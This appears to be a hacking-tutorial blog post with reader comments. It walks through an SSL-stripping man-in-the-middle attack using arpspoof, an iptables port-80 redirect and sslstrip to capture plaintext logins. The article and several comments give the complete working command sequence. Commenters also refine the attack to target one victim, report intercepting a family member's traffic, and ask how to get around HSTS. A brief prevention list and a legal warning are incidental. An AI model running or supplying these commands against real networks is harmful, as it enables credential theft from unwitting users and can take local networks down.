• 10,063
  • 91
  • +538
  • 821
Break SSL Protection Using SSLStrip and Backtrack 5

Break SSL Protection Using SSLStrip and Backtrack 5

Bookmark

Type : Tutorial

Level : Medium, Advanced

Some people asks "Are you sure SSL(Secure Socket Layer) port 443 can be hacked and we know the password sent over the network??"…..how to break ssl protection using sslstrip?

What is SSL?

For more information about this, you can see my previous tutorial about SSL and HTTPS.

actually if you see my explanation about SSL in my previous post, when we try to break the encryption it’s a little bit hard to break, but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption using Man in the Middle Attack :-).

Man in the Middle Attack

What is Man in the Middle Attack? I also have already write down about this in my previous post about "Hacking Facebook Using Man in the Middle Attack"

Requirement :

1. Linux OS

2. Arpspoof

3. IPTables

4. SSLStrip

5. NetStat

All of this requirements maybe have other dependencies with other packages, I suggest you to use Backtrack Linux for more easier to do this tutorial, because all of the requirement package already installed inside Backtrack Linux(except SSLStrip).

Perform the Attack – Man in the Middle Attack

1. Set your Linux box to make it can forward every incoming port(enable port forwarding).

echo ’1’ > /proc/sys/net/ipv4/ip_forward

This code will let your Linux Backtrack have ability to forward every packet that was not intended for your machine.

2. Know your network gateway

netstat -nr

Break SSL Protection Using SSLStrip and Backtrack 5

For example i’ve already know that my gateway address is 192.168.8.8

3. Use ARP spoof to perform Man in the Middle Attack

arpspoof -i eth0 192.168.8.8

a. Change "eth0" to your network card that currently connected to the network. Usually it is eth0 or wlan0.

b. Change "192.168.8.8" to your network default gateway.

c. In this tutorial I use arpspoof to entire network. Be careful if your network have a large user connected to it, because it will crash your network and bring your network down.

SSL Strip

Created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. -Taken from author website-

This all happens on the fly, and is practically will invisible to users. The only way to notice is by checking the URL in the address bar where normally it would display HTTPS, it will now display HTTP instead.

Install SSL Strip (optional)

1. Download SSL Strip

2. tar zxvf sslstrip-0.9.tar.gz

3. cd sslstrip-0.9

4. python setup.py install

Break SSL Protection Using SSLStrip and Backtrack 5

1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

2. After finished set up iptables, the next step we need to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IP forwarding)

echo ’1’ > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8

Break SSL Protection Using SSLStrip and Backtrack 5

3. When everything running well, you will see that ARPSpoof capturing network traffic, then the next step you need to start your SSL Strip by opening new terminal(CTRL+ALT+T)

sslstrip -l 8080

"-l" tells the system to listen on specified port.

Break SSL Protection Using SSLStrip and Backtrack 5

Above picture tells that SSL Strip already running and waiting for victim opening SSL URL such as (https://mail.google.com; https://mail.yahoo.com; etc)

As a victim I will try to open https://mail.live.com. When I open the page, what I see is looks like below picture

Backtrack 5 SSL Strip tutorial

The URL changed into HTTP. :-)

4. After SSL Strip capturing enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After you stop it, the whole network will be down and cannot be accessed for a while(it shouldn’t take long time), this can happen because ARPSpoof didn’t automatically repopulate the ARP tables with router proper MAC address.

5. Inside the SSL Strip folder there will be a new file created "sslstrip.log" that stores all information that already captured over the HTTP protocol and even the HTTPS. Just take a look to the file using your favorite text editor. Below picture is the content of my sslstrip.log :that already captured victim data when they open https://mail.live.com.

Break SSL Protection Using SSLStrip and Backtrack 5

You can see the plain data of username and password there.

 

Prevention of SSL Strip Attack

1. If you are on public network (internet cafe, unsecured hotspot, etc) minimalize login into your personal account.

2. Use SSH Tunneling (You can see the tutorial here).

3. Keep your eyes open.

This fake URL address  Break SSL Protection Using SSLStrip and Backtrack 5

Different with this one Break SSL Protection Using SSLStrip and Backtrack 5

 

Remember This !

Be wise to use this application, and don’t get shocked if this application also can help you go to jail faster if you use for an unintended purpose by law.

Regards : Vishnu Valentino

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: SSL hacking « My Blog

  • http://www.ehacking.net Ethical Hacking

    Its done check this out   http://www.ehacking.net/2011/06/crack-ssl-using-sslstrip-with.html

  • http://reversecalllookupx.com/ reverse call lookup

    Thanks for the article, first time seeing your site. I would love to contribute more in the future.

  • http://reversecalllookupx.com/ reverse call lookup

    Thanks for the informative post.. and thanks for adding my comment to the blog.

  • saurabh msihra

    It does'n work in google crome

  • saurabh msihra

    and youtube also doesn't buffer the video

  • chard

    Thanks Vishu i run an update/upgrade and it works now.  can you give a  little favor i know this is the wrong forum but if you like to answer my question? Im having a trouble in sslstrip its updated and I dont think i must download a newer version of sslstrip because when i updated backtrack it comes along (new version) i think.  my problem is that  when i type sslstrip -l 10000 it says sslstrip:command not found? its not found?but its installed and its updated do i have to enable it or something cant get it?pls help me vishnu.hoping for your response

    Read more : http://www./computer/how-to-set-up-armitage-in-backtrack-5/#comment-2595

    • http://www.vishnuvalentino.com v4L

      #chard
      you should go to sslstrip folder….. try to search it by using whereis sslstrip or search sslstrip command and run it from there.

  • 3n1gma

    Now I've had issues in the past with sslstrip on backtrack5.   I can never get it to capture data. I've used all of the recommended changes.  All of the commands have been followed to the letter. Yet still there is nothing.  Now I can perform MITM attacks all day.  I just can't get sslstrip to work.  SMDH!!! What am I doing wrong???? :-(

  • Amnesiac

    hi, i tried everything in this post, even tried different posts but i cant get the sslstrip program to capture anything, it runs fine, i have set my iptables and ports, arpspoof’s working and i also use ettercap, but when i get to the point of actually getting the packets i get nothing, i just get this:

    “sslstrip 0.9 by Moxie Marlinspike running…”

    and it doesnt capture anything. Any ideas??? Im using backtrack 5.

    • http://www.vishnuvalentino.com v4L

      #Amnesiac
      In which network you run it?

  • Dorky

    after entering netstat -nr there's no gateway output, it only say Keep ip routing table gateway etc.

    • http://www.vishnuvalentino.com v4L

      #Dorky
      maybe you haven’t set your gateway yet…

  • Dorky

    can u tell me how to set it, i just follow the echo '1'  command then type netstat -nr and then all is blank

    • http://www.vishnuvalentino.com v4L

      #Dorky
      Something like route add default gw 192.168.1.0

  • monkeyPhisher

    sslstrip v0.9 has errors in it, go back to v0.8 or v0.6

  • hueyii

    I cant get the iptables comand to work.  It returns the error:
    iptables: No chain/target/match by that name
    (I booted from the Backtrack5 CD)

    • http://www.vishnuvalentino.com v4L

      #hueyii
      Did you already configured your network address?
      try run iptables -L to list the table

  • Dorky

    i have successfuly run sslstrip, if i bring my laptop to a wifi area will it sniff automaticaly?

    • http://www.vishnuvalentino.com v4L

      #Dorky
      No you can’t, you should have wi-fi card that support promiscious mode…

  • hueyii

    Since I posted the question, I have installed BT5 to my hard drive.  I have made no modifications.  When I list iptables it looks like nothings configured?
     
    root@bt:~# iptables -L
    Chain INPUT (policy ACCEPT)
    target     prot opt source               destination
    Chain FORWARD (policy ACCEPT)
    target     prot opt source              destination
    Chain OUTPUT (policy ACCEPT)
    target     prot opt source               destination
     
    Do I need to configure iptables first?

  • hueyii

    I created basic rules with iptables.  Now iptables -L returns:
    Chain INPUT (policy ACCEPT)
    target     prot opt source               destination
    ACCEPT     tcp  —  anywhere             anywhere            state ESTABLISHED
    ACCEPT     udp  —  anywhere             anywhere            state ESTABLISHED
    ACCEPT     icmp —  anywhere             anywhere            state RELATED,ESTABLISHED
    DROP       all  —  anywhere             anywhere           
    Chain FORWARD (policy ACCEPT)
    target     prot opt source               destination        
    Chain OUTPUT (policy ACCEPT)
    target     prot opt source               destination        
    ACCEPT     tcp  —  anywhere             anywhere            state NEW,ESTABLISHED
    ACCEPT     udp  —  anywhere             anywhere            state NEW,ESTABLISHED
    ACCEPT     icmp —  anywhere             anywhere            state NEW,RELATED,ESTABLISHED
    but I still get the same error :(

  • hueyii

    oops.  I had a typo in the iptables command.
     
    Thx

  • hueyii

    It worked.  Thanx.  One thing to note is that with backtrack5 I had to use the following procedure.  It's the same but there were differences in the sslstrip location as well as the resulting sslstrip.log
    echo 'turn on ipforwarding'
    echo '1' > /proc/sys/net/ipv4/ip_forward
    echo 'the next line spoofs the subnets default gateway'
    arpspoof -i eth0 192.168.255.254
    echo 'Run this in a seperate console.  It will redirect packets received on port 80 to port 8080 where sslstrip will be listening'
    iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
    echo 'Start sslstrip on port 8080'
    python /pentest/web/sslstrip/sslstrip.py -l 8080

    echo 'When finished, use ctrl-c to kill arpspoof and sslstrip. Look for what was captured in sslstrip.log.  I found this in the root folder'
     

  • mukul

    i am using bt r2 with vmware and this is not saving in data in sslstrip.log

    • http://www.vishnuvalentino.com v4L

      #mukul
      hmm…when you run sslstrip, the logfile should be saved inside the folder you run the sslstrip application.

  • Bobby

    I have the same Mukul's problem. I am using BT R2 with VMware and this not saving in log data. I try to create a new logfile (such as abc.log) but it's a empty file. I have the Virtual Mechine use BTR2 and my laptop uses Win7. I try to break ssl on my Win7 laptop, but it's successful. I can not access to the https on my laptop when arpspoof and sslstrip are runing on VM. Can you give me any advice?

    • http://www.vishnuvalentino.com v4L

      #Bobby
      Is there’s any error messages appear in your sslstrip.log?

  • http://pensilendy.blogspot.com Endi

    thanks for the tuts man

    • http://www.vishnuvalentino.com v4L

      #Endi
      You’re welcome

  • Stephan S

    Unfortunately not such a big security issue anymore since HSTS, https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
     
    you found anyway to circunvent this?

    • http://www.vishnuvalentino.com v4L

      #Stephan
      Have no idea yet :-) but out there still a lot of users won’t update their browsers nor O.S, maybe for some vendor they already applied it, but not whole user migrate to the new one :-P

    • Stephen Smith

      I don’t think it’s hard to get around. They recommend using 301 redirects, which already can be exploited by sslstrip. I’m pretty sure SSLStrip could be modified to take out the HSTS header because that would be sent insecurely as well.

    • http://denzuko.computekindustries.com/ Master Den Zuko

      MITM attacks and TLS decoding are at Layer 3 and Layer 6 of the OSI Model HTTP headers is Layer 7. Therefor, HSTS is already compromised at this level since you are already sending HTTP headers after the TLS session was decoded.

  • vishal

    dude, when i type ipconfig ..
    it show something like this ..
    No command ‘ipconfig’ found, did you mean:
    Command ‘tpconfig’ from package ‘tpconfig’ (universe)
    Command ‘iwconfig’ from package ‘wireless-tools’ (main)
    Command ‘ifconfig’ from package ‘net-tools’ (main)
    ipconfig: command not found
    any solution ??

    • richard

      it should be
      ifconfig or ipconfig

      ipconfig works only in windows ..

    • http://denzuko.computekindustries.com/ Master Den Zuko

      ipconfig is microsoft, the unix(bsd,linux,osx,…) equivalent is ifconfig(1) or ip(1) [the (1) denotes the manual page number: ie man 1 ip or man 1 ifconfig]

  • Dorky

    I have tried lot of sslstrip commands but still no log in sslstrip.log. My card can sniff pics using driftnet and crack wpa2 keys but no log after running sslstrip help!

  • Ricardo

    it isn’t working when i type arpspoof -i eth0 192.168.1.1 nor -i wlan0… what am i doing wrong?

  • http://www.hacking-tutorial.com/ v4L

    #Ricardo
    you can add -t switch for target IP.
    for wlan, your wifi card should support promiscuous mode

    • Ricardo

      thanks! im really newbie about these things but i love studying it
      im reading this page everyday and im almost there !!!! :P

      also reading others but there’re different syntaxes…

      what I did,step by step:
      echo 1 > /proc/sys/net/ipv4/ip_forward;
      arpspoof -i wlan0 -t 192.168.1.6 192.168.8.8;
      in other tab:

      echo 1 > /proc/sys/net/ipv4/ip_forward;
      iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080;
      sslstrip -l 8080;

      after all, i open sslstrp.log and get my brother’s encrypted post
      i should be able to read, shouldnt i ?
      thanks again

      • Ricardo

        ah, those IP’s above were just example, i wrote’em right…

        • Ricardo

          GOT IT !!!!!!

          but it didnt work with FB

      • cobra

        echo 1 > /proc/sys/net/ipv4/ip_forward

        arpspoof -i eth0 -t victimip default_gateway_ip

        example: arpspoof -i eth0 -t 192.168.1.249 192.168.1.1 the eth0 could be wlano it depends how you are connected this one is for a specific client “victim”

        *this for the whole network: arpspoof -i eth0 192.168.1.1* “everyone on it”

        iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

        sslstrip –l 10000

        tail -n 50 -f sslstrip.log

        This should now show you the results of the SSL strip attack.

        all of these is done using kali linux, good luck.

        • Ricardo

          ive got it!

          but there’s a problem…..
          when the target type “face” then autocomplete, this way will take him https..
          or if the target search for face on google then click on the link, this way also will bring him to https…..

          the only way ive got is: when the target type the whole page “www.facebook.com”

          ** it not happens with gmail, ymail, hotmail etc because they bring us only http :D not https as face….

          i was wondering if we could spoof their dns or url but i didnt get yet ://

  • MioSan389

    v4l, can we also use VPN to protect our connection Public..? and whats different between them (SSH and VPN)

    • http://www.vishnuvalentino.com Vishnu Valentino

      @MioSan389

      Yes you can use VPN too.

      VPN = Virtual Private Network usually used to secure connection between one endpoint and other point through public connection.

      SSH = Secure Shell usually used to secure connection between client and server directly (ssh client and ssh server).

  • Michael Roberts

    les -t nat -A where to I find info on all this syntax how and what it means?